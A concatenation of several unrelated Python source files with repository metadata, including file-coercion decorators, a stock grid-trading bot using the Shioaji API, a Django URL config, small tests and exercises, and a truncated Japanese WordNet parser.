] | permissive | soundata/soundata | 85c940c84a606bc33ee677602d4987ab91e5fe6c | 6c91c626cc08030458829371ae804e36ac130552 | refs/heads/main | 2023-08-22T16:07:30.010405 | 2023-04-28T17:40:13 | 2023-04-28T17:40:13 | 343,599,660 | 233 | 19 | BSD-3-Clause | 2023-08-04T21:45:49 | 2021-03-02T00:42:25 | Python | UTF-8 | Python | false | false | 1,602 | py | import functools
import io
from typing import BinaryIO, Callable, Optional, TextIO, TypeVar, Union
T = TypeVar("T") # Can be anything
def coerce_to_string_io(
func: Callable[[TextIO], T]
) -> Callable[[Optional[Union[str, TextIO]]], Optional[T]]:
@functools.wraps(func)
def wrapper(file_path_or_obj: Optional[Union[str, TextIO]]) -> Optional[T]:
if not file_path_or_obj:
return None
if isinstance(file_path_or_obj, str):
with open(file_path_or_obj) as f:
return func(f)
elif isinstance(file_path_or_obj, io.StringIO):
return func(file_path_or_obj)
else:
raise ValueError(
"Invalid argument passed to {}, argument has the type {}",
func.__name__,
type(file_path_or_obj),
)
return wrapper
def coerce_to_bytes_io(
func: Callable[[BinaryIO], T]
) -> Callable[[Optional[Union[str, BinaryIO]]], Optional[T]]:
@functools.wraps(func)
def wrapper(file_path_or_obj: Optional[Union[str, BinaryIO]]) -> Optional[T]:
if not file_path_or_obj:
return None
if isinstance(file_path_or_obj, str):
with open(file_path_or_obj, "rb") as f:
return func(f)
elif isinstance(file_path_or_obj, io.BytesIO):
return func(file_path_or_obj)
else:
raise ValueError(
"Invalid argument passed to {}, argument has the type {}",
func.__name__,
type(file_path_or_obj),
)
return wrapper
| [
"noreply@github.com"
] | soundata.noreply@github.com |
317b01f512f5c33b18535d05ccdea940bf6cf130 | 686a59755d46e60fe3ebf8779253f7dc97a0b67a | /Ithome30days/Gridbot.py | deb99254d288d50e5d2df3fe0eed4e73db56c16c | [] | no_license | Lnanhung14/ithome_ironman2021 | 5b49bd1dec52fcb19f11611c86911952dae6fd27 | 3af8bd4f73c8945b2ef79052884493e679c89e11 | refs/heads/master | 2023-08-28T23:56:02.080752 | 2021-10-03T09:30:58 | 2021-10-03T09:30:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,194 | py | from shioaji.data import Kbars
import pandas as pd
import shioaji
import matplotlib.pyplot as plt
import yfinance as yf
import numpy as np
import ShiojiLogin
api=ShiojiLogin.api
import datetime
class GridBot:
upperid='006208'
lowerid='00646'
upperprice=0
uppershare=0
lowerprice=0
lowershare=0
uppershareTarget=0
lowershareTarget=0
MA=0
money=0
parameters={'BiasUpperLimit':1.1,\
'UpperLimitPosition':0.1,\
'BiasLowerLimit':0.9,\
'LowerLimitPosition':0.9,\
'BiasPeriod':50}
year=0
month=0
day=0
def __init__(self,uppershare=0,lowershare=0,money=10000):
self.money=money
self.uppershare=uppershare
self.lowershare=lowershare
self.contractUpper = api.Contracts.Stocks[self.upperid]
self.contractLower = api.Contracts.Stocks[self.lowerid]
def cancelOrders(self):
api.update_status()
tradelist=api.list_trades()
tradeUpper=[]
tradeLower=[]
for i in range(0,len(tradelist),1):
thistrade=tradelist[i]
cond1=str(thistrade.status.status)=='Status.Submitted'\
or str(thistrade.status.status)=='Status.PartFilled'
cond2=thistrade.contract.code==self.upperid
cond3=thistrade.contract.code==self.lowerid
cond4=self.lowerid!='Cash'
if(cond1 and cond2):
tradeUpper.append(thistrade)
if(cond1 and cond3 and cond4):
tradeLower.append(thistrade)
for i in range(0,len(tradeUpper),1):
api.cancel_order(trade=tradeUpper[i])
if(self.lowerid!='Cash'):
for i in range(0,len(tradeLower),1):
api.cancel_order(trade=tradeLower[i])
def getPositions(self):
portfolio=api.list_positions(unit=shioaji.constant.Unit.Share)
df_positions = pd.DataFrame(portfolio)
quantity=df_positions.loc[df_positions['code'] == self.upperid]['quantity']
if(quantity.size==0):
self.uppershare=0
else:
self.uppershare=int(quantity)
if(self.lowerid!='Cash'):
quantity=df_positions.loc[df_positions['code'] == self.lowerid]['quantity']
if(quantity.size==0):
self.lowershare=0
else:
self.lowershare=int(quantity)
def sendOrders(self):
quantityUpper=self.uppershareTarget-self.uppershare
quantityLower=self.lowershareTarget-self.lowershare
code=self.upperid
money=self.money
if(quantityUpper>0):
order = api.Order(
price=stockBid[code],
quantity=quantityUpper,
action=shioaji.constant.Action.Buy,
price_type=shioaji.constant.StockPriceType.LMT,
order_type=shioaji.constant.TFTOrderType.ROD,
order_lot=shioaji.constant.TFTStockOrderLot.IntradayOdd,
account=api.stock_account,
)
print(code,' buy:')
print('quantity:',quantityUpper)
print('price:',stockBid[code])
else:
order = api.Order(
price=stockAsk[code],
quantity=abs(quantityUpper),
action=shioaji.constant.Action.Sell,
price_type=shioaji.constant.StockPriceType.LMT,
order_type=shioaji.constant.TFTOrderType.ROD,
order_lot=shioaji.constant.TFTStockOrderLot.IntradayOdd,
account=api.stock_account,
)
print(code,' sell:')
print('quantity:',abs(quantityUpper))
print('price:',stockAsk[code])
if(abs(quantityUpper)*stockPrice[code]>=2000):
contract = api.Contracts.Stocks[code]
cost=stockBid[code]*quantityUpper
if(quantityUpper>0):
if(money>cost):
money=money-cost
trade = api.place_order(contract, order)
else:
trade = api.place_order(contract, order)
if(self.lowerid!='Cash'):
code=self.lowerid
if(quantityLower>0):
order = api.Order(
price=stockBid[code],
quantity=quantityLower,
action=shioaji.constant.Action.Buy,
price_type=shioaji.constant.StockPriceType.LMT,
order_type=shioaji.constant.TFTOrderType.ROD,
order_lot=shioaji.constant.TFTStockOrderLot.IntradayOdd,
account=api.stock_account,
)
print(code,' buy:')
print('quantity:',quantityLower)
print('price:',stockBid[code])
else:
order = api.Order(
price=stockAsk[code],
quantity=-quantityLower,
action=shioaji.constant.Action.Sell,
price_type=shioaji.constant.StockPriceType.LMT,
order_type=shioaji.constant.TFTOrderType.ROD,
order_lot=shioaji.constant.TFTStockOrderLot.IntradayOdd,
account=api.stock_account,
)
print(code,' sell:')
print('quantity:',abs(quantityLower))
print('price:',stockAsk[code])
if(abs(quantityLower)*stockPrice[code]>=2000):
contract = api.Contracts.Stocks[code]
cost=stockBid[code]*quantityLower
if(quantityLower>0):
if(money>cost):
money=money-cost
trade = api.place_order(contract, order)
else:
trade = api.place_order(contract, order)
def updateOrder(self):
now = datetime.datetime.now()
minute=now.minute
second=now.second
if(minute%3==0 and second>=30):
return
if(minute%3==1 and second<=30):
return
#1.delete orders
self.cancelOrders()
#2.update positions
self.getPositions()
#3.create orders
self.sendOrders()
def calculateSharetarget(self,upperprice,lowerprice):
global accountCash
currentcash=getCash()
self.money+=currentcash-accountCash
accountCash=currentcash
MA=self.MA
uppershare=self.uppershare
lowershare=self.lowershare
money=self.money
capitalInBot=money+uppershare*upperprice+lowershare*lowerprice
#計算目標部位百分比
# print('MA:',MA)
# print('upperprice:',upperprice)
# print('lowerprice:',lowerprice)
Bias=(upperprice/lowerprice)/MA
# print('Bias:',Bias)
BiasUpperLimit=self.parameters['BiasUpperLimit']
UpperLimitPosition=self.parameters['UpperLimitPosition']
BiasLowerLimit=self.parameters['BiasLowerLimit']
LowerLimitPosition=self.parameters['LowerLimitPosition']
BiasPeriod=self.parameters['BiasPeriod']
shareTarget=(Bias-BiasLowerLimit)/(BiasUpperLimit-BiasLowerLimit)
shareTarget=shareTarget*(UpperLimitPosition-LowerLimitPosition)+LowerLimitPosition
shareTarget=max(shareTarget,UpperLimitPosition)
shareTarget=min(shareTarget,LowerLimitPosition)
# print('shareTarget:',shareTarget)
#print("shareTarget:",shareTarget)
#計算目標部位(股數)
self.uppershareTarget=int(shareTarget*capitalInBot/upperprice)
self.lowershareTarget=int((1.0-shareTarget)*capitalInBot/lowerprice)
self.upperprice=upperprice
self.lowerprice=lowerprice
def UpdateMA(self):
now = datetime.datetime.now()
if(now.year!=self.year and now.month!= self.month and now.day!=self.day):
print('reading upper')
upper = yf.Ticker(self.upperid+".tw")
upper_hist = upper.history(period="3mo")
period=self.parameters['BiasPeriod']
upper_close=upper_hist['Close']
upperMA=upper_close[-(period+1):-1].sum()/period
if(self.lowerid!='Cash'):
print('reading lower')
lower = yf.Ticker(self.lowerid+".tw")
lower_hist = lower.history(period="3mo")
lower_close=lower_hist['Close']
close=(upper_close/lower_close).dropna()
self.MA=close[-(period+1):-1].sum()/period
else:
close=upper_close.dropna()
self.MA=close[-(period+1):-1].sum()/period
self.year=now.year
self.month=now.month
self.day=now.day
def getCash():
#交割金
settlement = api.list_settlements(api.stock_account)
df_settlement = pd.DataFrame(settlement)
cash_setttlement=float(df_settlement['t1_money'])+float(df_settlement['t2_money'])
#bank cash
acc_balance = api.account_balance()
df_acc = pd.DataFrame(acc_balance)
return float(df_acc['acc_balance'])+cash_setttlement
accountCash=getCash()
bot1=GridBot(uppershare=0,lowershare=0,money=10000)
import threading, time
from threading import Thread, Lock
mutexDict ={'006208':Lock(),'00646':Lock()}
mutexBidAskDict ={'006208':Lock(),'00646':Lock()}
subscribeStockList=['006208','00646']
snapshots={}
snapshots['006208'] = api.snapshots([api.Contracts.Stocks['006208']])
snapshots['00646'] = api.snapshots([api.Contracts.Stocks['00646']])
#抓取創建BOT當下的價格當作預設值
stockPrice={'006208':snapshots['006208'][0]['close'],\
'00646' :snapshots['00646'][0]['close']}
stockBid={'006208':snapshots['006208'][0]['close'],\
'00646' :snapshots['00646'][0]['close']}
stockAsk={'006208':snapshots['006208'][0]['close'],\
'00646' :snapshots['00646'][0]['close']}
def jobs_per1min():
while(1):
bot1.UpdateMA()
print('UpdateMA Done')
#get price
mutexDict['006208'].acquire()
mutexDict['00646'].acquire()
mutexBidAskDict['006208'].acquire()
mutexBidAskDict['00646'].acquire()
if(stockPrice['006208']>stockAsk['006208'] or stockPrice['006208']<stockBid['006208']):
stockPrice['006208']=(stockAsk['006208']+stockBid['006208'])/2
if(stockPrice['00646']>stockAsk['00646'] or stockPrice['00646']<stockBid['00646']):
stockPrice['00646']=(stockAsk['00646']+stockBid['00646'])/2
mutexDict['00646'].release()
mutexDict['006208'].release()
mutexBidAskDict['00646'].release()
mutexBidAskDict['006208'].release()
#update share target
bot1.calculateSharetarget(upperprice=stockPrice['006208']\
,lowerprice=stockPrice['00646'])
current_time = time.time()
#update orders
bot1.updateOrder()
cooldown=60
time_to_sleep = cooldown - (current_time % cooldown)
time.sleep(time_to_sleep)
thread = threading.Thread(target=jobs_per1min)
thread.start()
contract_006208 = api.Contracts.Stocks["006208"]
contract_00646 = api.Contracts.Stocks["00646"]
tick_006208=api.quote.subscribe(\
contract_006208,\
quote_type = shioaji.constant.QuoteType.Tick,\
version = shioaji.constant.QuoteVersion.v1,\
intraday_odd = True
)
bidask006208=api.quote.subscribe(\
contract_006208,\
quote_type = shioaji.constant.QuoteType.BidAsk,\
version = shioaji.constant.QuoteVersion.v1,\
intraday_odd=True
)
tick_00646=api.quote.subscribe(\
contract_00646,\
quote_type = shioaji.constant.QuoteType.Tick,\
version = shioaji.constant.QuoteVersion.v1,\
intraday_odd = True
)
bidask00646=api.quote.subscribe(\
contract_00646,\
quote_type = shioaji.constant.QuoteType.BidAsk,\
version = shioaji.constant.QuoteVersion.v1,\
intraday_odd=True
)
from shioaji import BidAskSTKv1, Exchange,TickSTKv1
@api.on_tick_stk_v1()
def STKtick_callback(exchange: Exchange, tick:TickSTKv1):
code=tick['code']
mutexDict[code].acquire()
stockPrice[code]=float(tick['close'])
mutexDict[code].release()
#print(f"Exchange: {exchange}, Tick: {tick}")
api.quote.set_on_tick_stk_v1_callback(STKtick_callback)
@api.on_bidask_stk_v1()
def STK_BidAsk_callback(exchange: Exchange, bidask:BidAskSTKv1):
code=bidask['code']
mutexBidAskDict[code].acquire()
stockBid[code]=float(bidask['bid_price'][0])
stockAsk[code]=float(bidask['ask_price'][0])
mutexBidAskDict[code].release()
#print(f"Exchange: {exchange}, BidAsk: {bidask}")
api.quote.set_on_bidask_stk_v1_callback(STK_BidAsk_callback)
@api.quote.on_event
def event_callback(resp_code: int, event_code: int, info: str, event: str):
print(f'Event code: {event_code} | Event: {event}')
api.quote.set_event_callback(event_callback)
| [
"aaa0025235@gmail.com"
] | aaa0025235@gmail.com |
52aee0fd09b24edae3d34ee70ae4d681a2aa67da | 3291359d8867e7b5ca9e8befb83629810938f903 | /timetable_v3/timetable_v3/urls.py | eb0c1bca0f82d83d2d60c6e88d1f7d126e417997 | [] | no_license | A-miin/timetable_v3 | f9e4610800acb83f3477dcffd2b0ce1c75d2c1d0 | 1de0885f04beec83657672275deff22b71af2de3 | refs/heads/master | 2023-06-09T18:51:44.298534 | 2021-07-02T15:01:54 | 2021-07-02T15:01:54 | 341,462,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,035 | py | """timetable_v3 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
import debug_toolbar
from webapp import urls
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('webapp.urls')),
path('secretariat/', include('secretariat.urls', namespace='secretariat')),
path('api/', include('api.urls', namespace='api')),
path('__debug__/', include(debug_toolbar.urls)),
]
| [
"zulaykaisaeva@gmail.com"
] | zulaykaisaeva@gmail.com |
2ad7d7451c252323a7b922b7ce42a3e1f7a03c10 | 1ec29bec73904435980eedc26b3f1e07fafb8784 | /shmakovpn/tests/add_method_to_class/test_add_method_to_class.py | cbf04d3fd1befc3caed91a88242ef0ba4f9491ed | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | shmakovpn/shmakovpn_tools | 4f799c803f4ebdff0e82253ec161d5977e6036cb | 85090c9489b0b9fa13b6c42c91459efe9b966a3b | refs/heads/master | 2023-06-08T17:32:34.591391 | 2021-06-17T05:22:38 | 2021-06-17T05:22:38 | 284,875,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | """
The simple example that explains the impossibility of adding a method to builtin type.
Author: shmakovpn <shmakovpn@yandex.ru>
Date: 2020-10-01
"""
import unittest
class TestAddMethodToClass(unittest.TestCase):
"""
It is possible to add a method to a class outside of the class
"""
def test_add_method_to_class(self):
class A:
x = 'hello'
a = A()
A.get_x = lambda self: self.x
self.assertEqual(a.get_x(), 'hello')
def test_add_method_to_list(self):
"""
It is impossible to add a method to a built-in type
:return:
"""
try:
list.hello = lambda self: f'hello from list'
some_list = []
self.assertEqual(some_list.hello(), 'hello from list')
except TypeError as e:
pass
except Exception as e:
self.assertTrue(False, msg='An unknown exception was raised instead of the expected TypeError')
else:
self.assertTrue(False, msg='The expected TypeError exception was not raised')
| [
"shmakovpn@yandex.ru"
] | shmakovpn@yandex.ru |
c25275838589896ab6d41975281532489b4fc365 | e8ddc602f4904fd29aeca00b15bc6dfc56113a6f | /fillTest.py | 538807c89fd057b5557d88befd2d75d14230d353 | [] | no_license | Tycho-1/Computational_Investing | b7f00bab4fb7c9e8e79d7cb8c6474dcb2630dc77 | 923d4ecedc96845fae2aa5c364b0a858e5dafb55 | refs/heads/master | 2021-05-01T03:45:07.674418 | 2013-05-06T00:49:28 | 2013-05-06T00:49:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Mar 30 20:49:15 2013
@author: Aleks
"""
import pandas as pd
from pandas import Series
atemps = Series([101.5, 98, 0,85,100,92])
print atemps
print ""
sdtemps = atemps.drop(atemps.index[3])
print sdtemps
print ""
atemps.fillna(method = 'ffill')
print atemps
| [
"aleksbreian@gmail.com"
] | aleksbreian@gmail.com |
1d96bf4813081a39a86e6bc6ee1c75adb9b66020 | 23904f58e3e9af5552647b1ff57bb2fc306a70a6 | /day002/day-2-2-exercise.py | 90320fff387bbc1b6a9fd4aee2c094d7df8088ae | [] | no_license | mukalaraja/python_bootcamp | bedd426abbefea2e4c9a594efb7c6a4d70eb6d3a | 976faaa712b849355ea8e0c6afc053744a6a923a | refs/heads/main | 2023-06-14T20:45:49.691677 | 2021-07-09T15:43:37 | 2021-07-09T15:43:37 | 362,876,406 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | # 🚨 Don't change the code below 👇
weight= input("enter your weight in kg: ")
height= input("enter your height in m: ")
bmi= int(weight) / float(height) **2
print(bmi)
bmi_as_int= int(bmi)
print(bmi_as_int)
| [
"mukalaraja@gmail.com"
] | mukalaraja@gmail.com |
0a444651a13ec88f37dcbfaebe2e1fda767e96c6 | 6c251444500af6639d9f54eddd46b160554e61fd | /matpy.py | 1fc9b354e940699972d3e465b2cd9bc53046a931 | [] | no_license | gabrielsotoo/python | ccb797a477cb897ad31ae6287e7baee8de786ba0 | ed4fb70a43c238f06b97c1990a077acce0832432 | refs/heads/master | 2021-05-08T00:08:31.282390 | 2017-12-14T17:52:28 | 2017-12-14T17:52:28 | 107,627,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | #%%
#File to plot using matplotlib and numpy
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
x = np.linspace(0, 20, 100)
plt.plot(x, np.cos(x))
plt.show() | [
"gabosoto04@gmail.com"
] | gabosoto04@gmail.com |
bb08f8e91a38e28c4e74bc8b31b06874b86d8605 | 2ba87ce6df8179d06599c08b9afaadaea0a6dfee | /ThreadPool/test.py | 8644a6a9b1d8193a039d7021d4e61ff4bd2b98bb | [] | no_license | github-zbp/operating-system | 1e85446a3748fe663eb064cf64d06f2644cde5ff | 5a55405c2059848abd46ab65de9581d246092675 | refs/heads/master | 2023-01-11T23:04:29.396614 | 2020-11-09T07:20:22 | 2020-11-09T07:20:22 | 264,598,823 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,125 | py | # coding=utf-8
# import sys,os
#
# print(os.path.dirname(os.path.abspath(__file__)))
# sys.path.append(os.path.dirname(os.path.abspath(__file__)))
# os.chdir(".")
from Task import Task
from ThreadPool import ThreadPool
from Task import AsyncTask,Task
# 测试有返回值的任务
def asyncTask():
num = 0
for i in range(1000):
num += i
return num
def commonTask():
num = 0
for i in range(1000):
num += i
print(num)
# 实例化一个线程池
pool = ThreadPool()
# 先将线程池中所有线程启动,一开始没有任务,所以所有线程启动之后立即进入等待状态
pool.start()
# 添加100000个任务给线程池,里面的线程会自动获取任务执行
print("开始执行任务")
task_list = []
for i in range(100000):
task = Task(commonTask)
# task = AsyncTask(asyncTask)
pool.put_task(task)
task_list.append(task)
# 在此处可以进行一些主线程的逻辑处理,在主线程处理自己的逻辑的时候,线程池中的线程也在异步处理任务队列中的任务。
for task in task_list:
print(task.get_result()) | [
"wenzhangxiang@yeah.net"
] | wenzhangxiang@yeah.net |
7bd755a513ab33e0895934f2e894d6e4371e8e23 | 560e222464c11a74f74f5b6daf7e468d98f5baa7 | /build/cm_gazebo/catkin_generated/pkg.installspace.context.pc.py | 45611cfe294b22a5575e0a38f27af359d28718fe | [] | no_license | RichardYSun/MuscleLabROSWorkspace | 32a963e64b1d38ece8484c23d36d03fa2c077f24 | 8ccdf3e59ac882b7efd2aeb54547067782db9457 | refs/heads/master | 2022-11-30T16:20:45.596083 | 2020-08-04T15:10:14 | 2020-08-04T15:10:14 | 284,983,018 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "cm_gazebo"
PROJECT_SPACE_DIR = "/home/musclelab/coolmuscle/install"
PROJECT_VERSION = "0.0.0"
| [
"richard-y-sun@hotmail.com"
] | richard-y-sun@hotmail.com |
6d960cfa702fcfa1af1655fd6c24d17162ab5c31 | ea1e06e8edebf814845c6545018e0e67825fc0db | /python_scripts/continuous_MCTS.py | 3cb8c0e62e53270c57c4f39e7489d6a4bb569d6b | [] | no_license | dabinkim-LGOM/informative-path-planning | 8db31704dfb73dceed9c3587391681293482895d | 15fa11b937716707934a057ec64cfebfafcc0121 | refs/heads/master | 2021-05-16T22:47:13.273663 | 2020-07-22T09:08:42 | 2020-07-22T09:08:42 | 250,501,078 | 0 | 0 | null | 2020-03-27T10:10:15 | 2020-03-27T10:10:13 | null | UTF-8 | Python | false | false | 6,558 | py | # !/usr/bin/python
'''
Based on the library of PLUMES, extend Monte Carlo Tree Search class to continuous-action case.
This library allows access to the Monte Carlo Tree Search class used in the PLUMES framework.
A MCTS allows for performing many forward simulation of multiple-chained actions in order to
select the single most promising action to take at some time t. We have presented a variation
of the MCTS by forward simulating within an incrementally updated GP belief world.
'''
import numpy as np
import scipy as sp
import math
import os
import GPy as GPy
import time
from itertools import chain
import pdb
import logging
logger = logging.getLogger('robot')
from aq_library import *
import copy
import random
from mcts_library import *
import continuous_traj as traj
class conti_action_MCTS(MCTS):
'''
Class inherited from MCTS class.
'''
def __init__(self, time, computation_budget, belief, initial_pose, rollout_length, path_generator, aquisition_function, f_rew, T, aq_param = None, use_cost = False, tree_type = 'dpw'):
super(conti_action_MCTS, self).__init__(computation_budget, belief, initial_pose, rollout_length, path_generator, aquisition_function, f_rew, T, aq_param = None, use_cost = False, tree_type = 'dpw')
self.t = time
def simulate(self, t):
self.initialize_tree()
i = 0 #iteration count
# randomly sample the world for entropy search function
if self.f_rew == 'mes' or self.f_rew == 'maxs-mes':
self.max_val, self.max_locs, self.target = sample_max_vals(self.GP, t = t)
time_start = time.time()
# while we still have time to compute, generate the tree
while i < self.comp_budget:#time.time() - time_start < self.comp_budget:
i += 1
current_node = self.tree_policy()
sequence = self.rollout_policy(current_node)
reward, cost = self.get_reward(sequence)
self.update_tree(reward, cost, sequence) #Backpropagation
value_grad = self.get_value_gradient()
self.update_action(value_grad)
time_end = time.time()
print "Rollouts completed in", str(time_end - time_start) + "s",
# get the best action to take with most promising futures, base best on whether to
# consider cost
best_sequence, best_val, all_vals = self.get_best_child()
paths, dense_paths = self.path_generator.get_path_set(self.cp)
#Document the information
print "Number of rollouts:", i, "\t Size of tree:", len(self.tree)
logger.info("Number of rollouts: {} \t Size of tree: {}".format(i, len(self.tree)))
np.save('./figures/' + self.f_rew + '/tree_' + str(t) + '.npy', self.tree)
return self.tree[best_sequence][0], self.tree[best_sequence][1], best_val, paths, all_vals, self.max_locs, self.max_val
def update_action(self, value_grad):
'''
Based on the gradient value, update action and re-iterate generation of trajectory
'''
grad = self.get_value_gradient
# self.tree
def get_value_gradient(self):
val_gradient = 0.0
return val_gradient
if __name__ == "__main__":
print("Hello")
sample_step = 0.5
ranges = (0., 10., 0., 10.)
start = (0.25, 0.25, 0.0)
path_length = 1.5*175
coverage_path = [start]
across = 9.75
rise = 0.38
cp = start
waypoints = [cp]
l = 0
for i in range(0,51):
if i%2 == 0:
if cp[0] > ranges[1]/2:
cp = (cp[0]-across+0.25, cp[1], cp[2])
l += across
else:
cp = (cp[0]+across-0.25, cp[1], cp[2])
l += across
else:
cp = (cp[0], cp[1]+rise, cp[2])
l += rise
waypoints.append(cp)
x = [w[0] for w in waypoints]
y = [w[1] for w in waypoints]
samples = [start]
extra = 0
addit = 0
last = start
for i,w in enumerate(waypoints):
if i%4 == 0:
last = w[0]
while last+sample_step <= waypoints[i+1][0]:
samples.append((last+sample_step, w[1], w[2]))
last = samples[-1][0]
remainder = across-last
elif (i+1)%4 == 0:
last = waypoints[i-1][0]
while last-sample_step+(remainder) >= waypoints[i][0]:
samples.append((last-sample_step+(remainder), w[1], w[2]))
last = samples[-1][0]
remainder = across-last
xs = [s[0] for s in samples]
ys = [s[1] for s in samples]
reward_function = 'mes'
ranges = (0., 10., 0., 10.)
world = Environment(ranges = ranges, # x1min, x1max, x2min, x2max constraints
NUM_PTS = 20,
variance = 100.0,
lengthscale = 1.0,
visualize = True,
seed = 3)
evaluation = Evaluation(world = world,
reward_function = reward_function)
# Gather some prior observations to train the kernel (optional)
x1observe = np.linspace(ranges[0]+0.5, ranges[1]-0,5, 8)
x2observe = np.linspace(ranges[2]+0.5, ranges[3]-0.5, 8)
x1observe, x2observe = np.meshgrid(x1observe, x2observe, sparse = False, indexing = 'xy')
data = np.vstack([x1observe.ravel(), x2observe.ravel()]).T
observations = world.sample_value(data)
# Create the point robot
robot = Nonmyopic_Robot(sample_world = world.sample_value,
start_loc = (5.0, 5.0, 0.0),
extent = ranges,
kernel_file = None,
kernel_dataset = None,
prior_dataset = None,
#prior_dataset = (data, observations),
init_lengthscale = 1.0,
init_variance = 100.0,
noise = 0.0001,
path_generator = 'default',
frontier_size = 20,
horizon_length = 1.5,
turning_radius = 0.05,
sample_step = 0.5,
evaluation = evaluation,
f_rew = reward_function,
create_animation = True,
computation_budget = 5,
rollout_length = 3)
robot.planner(T = 20)
robot.visualize_world_model(screen = True)
robot.visualize_trajectory(screen = True)
robot.plot_information()
# const_MCTS = conti_action_MCTS(5.0)
# const_MCTS.initialize_tree()
| [
"dabin404@snu.ac.kr"
] | dabin404@snu.ac.kr |
44a9b117cfd8ad0e1c91c53496fdd1038c6f1973 | 5694af6d33f571d9e875df75743982d603ccf246 | /beginner/1094/1094.py | 033097c8d0d571e6eeaceef8e1005dfa8520bc42 | [
"MIT"
] | permissive | eliseuegewarth/uri-exercises | b0cf4b7a3eea6579e7734a000ac575f6eadf903f | b3edbd39492a9e42cb8731dc0c960917c503b075 | refs/heads/master | 2020-07-01T08:23:49.834989 | 2020-03-30T18:59:02 | 2020-03-30T18:59:02 | 201,106,860 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 568 | py |
n = int(input())
r, c, s, t = [0, 0, 0, 0]
for x in range(1,n+1):
ln = input().split()
if ln[1] == "R":
r = r + int(ln[0])
elif ln[1] == "C":
c = c + int(ln[0])
elif ln[1] == "S":
s = s + int(ln[0])
else:
pass
t = t + int(ln[0])
print("Total: {} cobaias".format(t))
print("Total de coelhos: {}".format(c))
print("Total de ratos: {}".format(r))
print("Total de sapos: {}".format(s))
print("Percentual de coelhos: {0:.2f} %".format(c*100/t))
print("Percentual de ratos: {0:.2f} %".format(r*100/t))
print("Percentual de sapos: {0:.2f} %".format(s*100/t))
| [
"eliseuegewarth@gmail.com"
] | eliseuegewarth@gmail.com |
185e376acffac2fbf4bac65598a834284256a095 | 7de3f254e6f0244bfd846c7e204fd2a23b55efeb | /corporate/urls.py | 84745890bc450a389885afb5703c5ea136bb039a | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-free-unknown"
] | permissive | k0nsl/zulip | 8fac8c4cffd686b6158cb08e1a7ed1631c07d2a7 | 6e3426fe10b6aa7061892d30d16ffa009dd8cbb0 | refs/heads/master | 2020-04-01T21:26:24.725227 | 2015-10-20T18:28:03 | 2015-11-01T04:20:34 | 45,353,099 | 0 | 0 | Apache-2.0 | 2020-01-27T02:09:05 | 2015-11-01T18:55:26 | Python | UTF-8 | Python | false | false | 410 | py | from django.conf.urls import patterns, url
from django.views.generic import TemplateView, RedirectView
urlpatterns = patterns('',
# Zephyr/MIT
url(r'^zephyr/$', TemplateView.as_view(template_name='corporate/zephyr.html')),
url(r'^mit/$', TemplateView.as_view(template_name='corporate/mit.html')),
url(r'^zephyr-mirror/$', TemplateView.as_view(template_name='corporate/zephyr-mirror.html')),
)
| [
"steve@zulip.com"
] | steve@zulip.com |
d8c34f6cc1362c8495c6188ce80609455548c57e | 683fd357a898cf5ed9d8e30db99305b0e7bbf7e3 | /prepare_scripts/p2.py | 61795f1c8833972c2cb07da02108d82054dc0641 | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | shisashi/ruigomush | d7e734e6813adb47b30cc606dceb7358e3217b05 | 982a0d27b44c27cf61d91cb24c76cdbc4b540d7c | refs/heads/master | 2021-01-10T19:40:31.108315 | 2012-01-27T07:27:35 | 2012-01-27T07:27:35 | 2,413,547 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,720 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from xml.etree.cElementTree import ElementTree
import codecs
import sys
import re
#CODING = 'cp932'
#ERRORS = 'backslashreplace' # 'xmlcharrefreplace'
#FILENAME_SUFFIX = 'sj'
CODING = 'utf-8'
ERRORS = 'strict'
FILENAME_SUFFIX = 'u8'
class Synset(object):
def __init__(self, ssid, definition):
self.ssid = ssid
self.definition = definition
self.words = []
# "(数値)年)" を含むものは固有名詞
self.is_proper_noun = definition is not None and re.search(u'\\d年)', definition) is not None
def __repr__(self):
s = u'%s(%s)' % (self.ssid, u','.join(self.words))
return s.encode('utf-8')
def generate_graph(tree):
lexicon = tree.find('Lexicon')
# synsetの一覧を読み込む
synsets = {}
ignored = []
for ss in lexicon.getiterator('Synset'):
ssid = ss.attrib['id'][8:] # 'jpn-1.1-' を除く
de = ss.find('Definition')
if de is None:
# 定義文がない
definition = None
else:
definition = de.attrib['gloss']
synset = Synset(ssid, definition)
if synset.is_proper_noun:
# 固有名詞の類なので除外する
ignored.append(synset)
else:
synsets[ssid] = synset
# 単語の一覧を読み込み、定義にぶら下げる
# 単語の出現数を数える
word_counter = {}
for le in lexicon.getiterator('LexicalEntry'):
lemma = le.find('Lemma').attrib['writtenForm']
n = 0
for ss in le.getiterator('Sense'):
ssid = ss.attrib['synset'][8:] # 'jpn-1.1-' を除く
synset = synsets.get(ssid)
if synset is not None:
